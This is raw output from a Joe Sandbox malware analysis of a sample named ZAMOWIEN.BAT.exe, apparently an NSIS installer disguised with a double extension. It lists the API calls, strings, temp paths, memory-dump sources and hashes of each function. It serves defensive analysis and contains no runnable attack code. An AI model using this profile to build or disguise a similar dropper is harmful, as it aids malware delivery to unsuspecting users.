                                                                                  • Instruction Fuzzy Hash: 9C019E7190021CBAEB00DB94DD81BFFBBBCAF95711F10412BBB10B61D0C7B499418BA4
                                                                                  APIs
                                                                                  • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402E11
                                                                                  • MulDiv.KERNEL32(000EDD22,00000064,000EDF26), ref: 00402E3C
                                                                                  • wsprintfW.USER32 ref: 00402E4C
                                                                                  • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                                                  Strings
                                                                                  • verifying installer: %d%%, xrefs: 00402E46
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                  • String ID: verifying installer: %d%%
                                                                                  • API String ID: 1451636040-82062127
                                                                                  • Opcode ID: 66d2592fca5784473147c8150b099ced33c2aea089bdfd78c1b867d04e1d1f0a
                                                                                  • Instruction ID: 4bcbb139cde21edcf0ff7b700e9789e452b98774f77cb7efe3bd4e4e9d403b43
                                                                                  • Opcode Fuzzy Hash: 66d2592fca5784473147c8150b099ced33c2aea089bdfd78c1b867d04e1d1f0a
                                                                                  • Instruction Fuzzy Hash: C701F47154020CABDF209F60DE49FAA3B69EB44705F008439FA45B51E0DBB995558F98
                                                                                  APIs
                                                                                    • Part of subcall function 7050121B: GlobalAlloc.KERNEL32(00000040,?,7050123B,?,705012DF,00000019,705011BE,-000000A0), ref: 70501225
                                                                                  • GlobalFree.KERNEL32(?), ref: 7050265B
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 70502690
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33351315934.0000000070501000.00000020.00000001.01000000.00000006.sdmp, Offset: 70500000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33351257625.0000000070500000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000000.00000002.33351412590.0000000070503000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000000.00000002.33351485317.0000000070505000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_70500000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$Free$Alloc
                                                                                  • String ID:
                                                                                  • API String ID: 1780285237-0
                                                                                  • Opcode ID: 73d263d998edd89af3c0d6c7fb24de35c43f32a1733adc2b687a2f5aa454ffb7
                                                                                  • Instruction ID: 8cf791059185bf6388d1b046f2f5bcb0225b47b59295c0753a0efed1a2efb920
                                                                                  • Opcode Fuzzy Hash: 73d263d998edd89af3c0d6c7fb24de35c43f32a1733adc2b687a2f5aa454ffb7
                                                                                  • Instruction Fuzzy Hash: C131DE72504101EFD7169F76CDACD2EBFBAEB99304720496DFA428B220DB32A8149B15
                                                                                  APIs
                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                  • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                  • String ID:
                                                                                  • API String ID: 2667972263-0
                                                                                  • Opcode ID: de92c1bd6f77b34e2ba4b4bc505dbe4f635d2773414333dd82a7c43b5c6c5a79
                                                                                  • Instruction ID: 08f8d52deffd015bf7aba9006bc7b8b19cff7c85b8e7ef16137ebd65050c2e74
                                                                                  • Opcode Fuzzy Hash: de92c1bd6f77b34e2ba4b4bc505dbe4f635d2773414333dd82a7c43b5c6c5a79
                                                                                  • Instruction Fuzzy Hash: 1B218071C00528BBCF116FA5DE49D9E7E79EF08364F10023AF954762E1CB794D419B98
                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
                                                                                  • wsprintfW.USER32 ref: 00404B52
                                                                                  • SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                  • String ID: %u.%u%s%s$6B
                                                                                  • API String ID: 3540041739-3884863406
                                                                                  • Opcode ID: 4da95cfef184c8e5e741e241c615311e7070c24a3f1e6bca6f3b0d0e52bef44f
                                                                                  • Instruction ID: 22ef8b20c3cb34d9681d0f1950c5ee3b7e818b69147609aa9b6e87f13a537159
                                                                                  • Opcode Fuzzy Hash: 4da95cfef184c8e5e741e241c615311e7070c24a3f1e6bca6f3b0d0e52bef44f
                                                                                  • Instruction Fuzzy Hash: 18110833A041283BDB10A96D9C46F9F329CDB85374F250237FA26F21D1DA79DC2182E8
                                                                                  APIs
                                                                                  • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
                                                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWidelstrlen
                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp$C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll
                                                                                  • API String ID: 3109718747-2878251781
                                                                                  • Opcode ID: 9d8b4e4d9dc988721d41fde04fb3c2a1eeeffc3d26af6733c4ada06497a3d1a6
                                                                                  • Instruction ID: 3dcd1766983357fa33eb9a2b17af164457a9c6038e68ae70dd04151361e6fae4
                                                                                  • Opcode Fuzzy Hash: 9d8b4e4d9dc988721d41fde04fb3c2a1eeeffc3d26af6733c4ada06497a3d1a6
                                                                                  • Instruction Fuzzy Hash: D7110872A00300BEDB146BB1CE89A9F76649F54389F20843BF502F61D1DAFC89425B6E
                                                                                  APIs
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 705024DA
                                                                                    • Part of subcall function 7050122C: lstrcpynW.KERNEL32(00000000,?,705012DF,00000019,705011BE,-000000A0), ref: 7050123C
                                                                                  • GlobalAlloc.KERNEL32(00000040), ref: 70502460
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 7050247B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33351315934.0000000070501000.00000020.00000001.01000000.00000006.sdmp, Offset: 70500000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33351257625.0000000070500000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000000.00000002.33351412590.0000000070503000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000000.00000002.33351485317.0000000070505000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_70500000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                  • String ID:
                                                                                  • API String ID: 4216380887-0
                                                                                  APIs
                                                                                  • GetDC.USER32(?), ref: 00401DBC
                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                  • CreateFontIndirectW.GDI32(0040CDA8), ref: 00401E3E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                  • String ID:
                                                                                  • API String ID: 3808545654-0
                                                                                  APIs
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,705021F0,?,00000808), ref: 70501639
                                                                                  • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,705021F0,?,00000808), ref: 70501640
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,705021F0,?,00000808), ref: 70501654
                                                                                  • GetProcAddress.KERNEL32(705021F0,00000000), ref: 7050165B
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 70501664
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33351315934.0000000070501000.00000020.00000001.01000000.00000006.sdmp, Offset: 70500000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33351257625.0000000070500000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000000.00000002.33351412590.0000000070503000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000000.00000002.33351485317.0000000070505000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_70500000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                  • String ID:
                                                                                  • API String ID: 1148316912-0
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                  • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                  • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                  • String ID:
                                                                                  • API String ID: 1849352358-0
                                                                                  APIs
                                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Timeout
                                                                                  • String ID: !
                                                                                  • API String ID: 1777923405-2657877971
                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403346,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,764A3420,004035A3,?,00000006,00000008,0000000A), ref: 00405B5F
                                                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403346,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,764A3420,004035A3,?,00000006,00000008,0000000A), ref: 00405B69
                                                                                  • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B7B
                                                                                  Strings
                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B59
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: CharPrevlstrcatlstrlen
                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                  • API String ID: 2659869361-3355392842
                                                                                  APIs
                                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Close$Enum
                                                                                  • String ID:
                                                                                  • API String ID: 464197530-0
                                                                                  APIs
                                                                                  • DestroyWindow.USER32(00000000,00000000,00403059,?,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                                  • GetTickCount.KERNEL32 ref: 00402EAA
                                                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                                                  • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                  • String ID:
                                                                                  • API String ID: 2102729457-0
                                                                                  APIs
                                                                                  • IsWindowVisible.USER32(?), ref: 0040528F
                                                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 004052E0
                                                                                    • Part of subcall function 00404247: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                  • String ID:
                                                                                  • API String ID: 3748168415-3916222277
                                                                                  • Opcode ID: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
                                                                                  • Instruction ID: 4f709491620671f980d9c6db17d5b9619efa9f8d8c8bffacc159c43cff332a87
                                                                                  • Opcode Fuzzy Hash: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
                                                                                  • Instruction Fuzzy Hash: 20019E7120060CAFDB319F40ED80A9B3B26EF90715F60007AFA00B52D1C73A9C529F69
                                                                                  APIs
                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,Call,?,?,004063C6,80000002), ref: 00406198
                                                                                  • RegCloseKey.ADVAPI32(?,?,004063C6,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll), ref: 004061A3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseQueryValue
                                                                                  • String ID: Call
                                                                                  • API String ID: 3356406503-1824292864
                                                                                  • Opcode ID: 359bde3ee35bb60dfaf4513243971435c641af9e5133143b55c2bc1c1ca92d99
                                                                                  • Instruction ID: bbbd3ef8f6d6f34ea5303db1c751cd258066777a1c36f61d7f193cbbff11b307
                                                                                  • Opcode Fuzzy Hash: 359bde3ee35bb60dfaf4513243971435c641af9e5133143b55c2bc1c1ca92d99
                                                                                  • Instruction Fuzzy Hash: B701BC32510209EBDF21CF50CD09EDF3BA8EB04360F01803AFD06A6191D738DA68CBA4
                                                                                  APIs
                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 00405896
                                                                                  • CloseHandle.KERNEL32(?), ref: 004058A3
                                                                                  Strings
                                                                                  • Error launching installer, xrefs: 00405880
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCreateHandleProcess
                                                                                  • String ID: Error launching installer
                                                                                  • API String ID: 3712363035-66219284
                                                                                  • Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                                  • Instruction ID: 38a1dae354cb2a4c5fc32891eb37452fbeb174cf60b6e0268020382365bb363f
                                                                                  • Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                                  • Instruction Fuzzy Hash: FFE0BFB560020ABFFB10AF64ED05F7B7AACFB14704F414535BD51F2150D7B898158A78
                                                                                  APIs
                                                                                  • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,764A3420,004038B7,004036CD,00000006,?,00000006,00000008,0000000A), ref: 004038F9
                                                                                  • GlobalFree.KERNEL32(?), ref: 00403900
                                                                                  Strings
                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004038F1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Free$GlobalLibrary
                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                  • API String ID: 1100898210-3355392842
                                                                                  • Opcode ID: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                                                                  • Instruction ID: bd2e2babf5735c078d8cab401dc84ea4626969b40d457a48d01b9ed958f4fa52
                                                                                  • Opcode Fuzzy Hash: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                                                                  • Instruction Fuzzy Hash: D6E01D339111305FC6315F55ED0475E77A95F54F22F05457BF8807716047745C925BD8
                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BAB
                                                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BBB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: CharPrevlstrlen
                                                                                  • String ID: C:\Users\user\Desktop
                                                                                  • API String ID: 2709904686-3370423016
                                                                                  • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                  • Instruction ID: 7007ae8f4af5416befc6157b9dfefed4fe058ad6210d844be01a540b02b626a9
                                                                                  • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                                  • Instruction Fuzzy Hash: 2ED05EB3411A209AD3226B04DD04D9F77B8EF51304746446AE840A61A6D7B87D8186AC
                                                                                  APIs
                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 7050116A
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 705011C7
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 705011D9
                                                                                  • GlobalFree.KERNEL32(?), ref: 70501203
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33351315934.0000000070501000.00000020.00000001.01000000.00000006.sdmp, Offset: 70500000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33351257625.0000000070500000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000000.00000002.33351412590.0000000070503000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000000.00000002.33351485317.0000000070505000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_70500000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$Free$Alloc
                                                                                  • String ID:
                                                                                  • API String ID: 1780285237-0
                                                                                  • Opcode ID: efa4f7277b82add51b0e193eb280dae6b66b72f00d0ea3abb898e4ce157cf506
                                                                                  • Instruction ID: 258d03cf67ed70306052c3f6c5625c774bd89fd91cf8af0f5e70fbdf6f0d6009
                                                                                  • Opcode Fuzzy Hash: efa4f7277b82add51b0e193eb280dae6b66b72f00d0ea3abb898e4ce157cf506
                                                                                  • Instruction Fuzzy Hash: BE3182F69002029FD3049F76DD59A2E7FE8EB95210B20051AFB46EB324F774D801CB6A
                                                                                  APIs
                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
                                                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D07
                                                                                  • CharNextA.USER32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D18
                                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                  • String ID:
                                                                                  • API String ID: 190613189-0
                                                                                  • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                  • Instruction ID: 3a8cc870ad476bca9dd132dfabecf91d91790aae7b943354cd32c9fe52050a58
                                                                                  • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                  • Instruction Fuzzy Hash: 09F0F631204918FFDB029FA4DD0499FBBA8EF16350B2580BAE840F7211D674DE01AB98

                                                                                  Execution Graph

                                                                                  Execution Coverage:0%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:100%
                                                                                  Total number of Nodes:1
                                                                                  Total number of Limit Nodes:0
                                                                                  execution_graph 81146 37712a80 LdrInitializeThunk

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 5 377134e0-377134ec LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
